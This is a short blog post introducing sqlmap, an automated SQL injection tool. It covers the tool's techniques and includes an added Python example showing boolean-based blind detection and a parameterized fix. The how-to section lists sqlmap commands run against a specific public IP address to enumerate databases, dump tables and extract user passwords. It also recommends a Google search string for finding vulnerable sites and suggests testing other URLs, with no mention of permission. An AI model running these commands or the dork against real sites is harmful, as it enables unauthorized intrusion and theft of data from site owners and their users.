SQLMAP

For all developers, programmers, and ethical hackers, it is essential to always protect your data and the data that is hosted on the network. This is why sqlmap exists: it is a tool developed in Python to perform SQL injection automatically. Its objective is to detect and take advantage of SQL injection vulnerabilities in web applications. The tool has a powerful detection engine, various functions for the penetration tester, and a wide range of switches that go from fingerprinting the database, through obtaining data from the database, to accessing the underlying file system and executing commands on the operating system through out-of-band connections.

SQLMAP supports various database engines, such as MySQL, Oracle, PostgreSQL, Microsoft SQL Server, SQLite, Firebird, Sybase and SAP MaxDB.

Among the main features of this tool is excellent support for six SQL injection techniques: boolean-based blind, time-based blind, error-based, UNION query, stacked queries and out-of-band.
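
The first of these techniques, boolean-based blind, depends on a page answering differently to a true and a false condition. The following added example (not part of the original post and not sqlmap's own code) shows that difference against a query built by string concatenation and its absence against a parameterized one; the table, data and function names are constructed for illustration.

```python
import sqlite3


def make_db():
    """Constructed sample data; table and column names are hypothetical."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE books (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany("INSERT INTO books VALUES (?, ?)",
                     [(1, "Book One"), (2, "Book Two")])
    return conn


def lookup_vulnerable(conn, book_id):
    # The id value is pasted into the SQL text, so the database parses it as SQL.
    sql = "SELECT title FROM books WHERE id = " + book_id
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn, book_id):
    # Validate the type first, then bind the value so it is never parsed as SQL.
    try:
        value = int(book_id)
    except ValueError:
        return []
    return conn.execute("SELECT title FROM books WHERE id = ?",
                        (value,)).fetchall()


def boolean_differential(lookup, conn, base="2"):
    """Return True if appended true/false conditions change the response.

    This is the signal a boolean-based blind check looks for: the true
    condition matches the baseline, the false condition does not.
    """
    baseline = lookup(conn, base)
    when_true = lookup(conn, base + " AND 1=1")
    when_false = lookup(conn, base + " AND 1=2")
    return when_true == baseline and when_false != baseline


if __name__ == "__main__":
    conn = make_db()
    for fn in (lookup_vulnerable, lookup_parameterized):
        print(fn.__name__, "shows boolean differential:",
              boolean_differential(fn, conn))
```

The same check can be used as a regression test after a fix: a data-access function that still shows the differential is still treating the parameter as SQL.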

The tool has many functionalities and features; it also supports downloading and uploading files from the file system underlying the database server when the database software is MySQL, PostgreSQL or Microsoft SQL Server.

When running SQLMAP, a straightforward way to find a website with a generic vulnerability is simply to enter the following in the search engine of your choice, such as Google: section.php?id=, which returns the fragile web pages.

How is it used?

Installation

sudo apt-get install sqlmap

or

pip install sqlmap

sqlmap

sqlmap -u "http://45.77.162.239/bookdetail.aspx?id=2" -b

sqlmap -u "http://45.77.162.239/bookdetail.aspx?id=2" --current-user

sqlmap -u "http://45.77.162.239/bookdetail.aspx?id=2" --current-db

Other tests

sqlmap -u "http://45.77.162.239/bookdetail.aspx?id=2" -D BookApp --tables
sqlmap -u "http://45.77.162.239/bookdetail.aspx?id=2" -D BookApp -T BOOKMASTER --columns
sqlmap -u "http://45.77.162.239/bookdetail.aspx?id=2" -D BookApp -T sysdiagrams --columns
sqlmap -u "http://45.77.162.239/bookdetail.aspx?id=2" -D BookApp -T BOOKMASTER --columns --dump
sqlmap -u "http://45.77.162.239/bookdetail.aspx?id=2" -D BookApp -T sysdiagrams --columns --dump
sqlmap -u "http://45.77.162.239/bookdetail.aspx?id=2" --users --passwords
I recommend that you test with other URLs and analyze the results.
Resources:

http://sqlmap.org/


This post was written by Ruben Dario Caravajal Herrera